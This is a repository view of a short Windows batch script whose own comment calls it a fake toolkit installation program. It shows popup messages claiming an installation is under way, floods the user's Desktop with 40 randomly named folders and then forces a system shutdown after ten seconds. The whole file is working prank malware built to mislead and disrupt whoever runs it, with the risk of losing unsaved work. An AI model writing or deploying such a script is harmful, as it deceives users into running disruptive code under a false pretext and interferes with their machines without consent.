summaryrefslogtreecommitdiff
path: root/ShitStain/Sequel/ShitStain_The_Sequel.bat
blob: c852830386f5ed4fcba934bb99f9a7735bdd0a7a (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
::fake toolkit instalation progrm that makes a ton of files in Desktop and shutsdown after that
@echo off
title Toolkit installation
msg * Toolkit installation is starting
cd /d %systemdrive%\Users\%username%\
tree
cd /d %systemdrive%\Users\%username%\Desktop
setlocal EnableDelayedExpansion
	for /l %%x in (1,1,40) do (
		mkdir !random! 
	)
endlocal
msg * The toolkit installation is nearly complete please wait ...
shutdown /s /t 10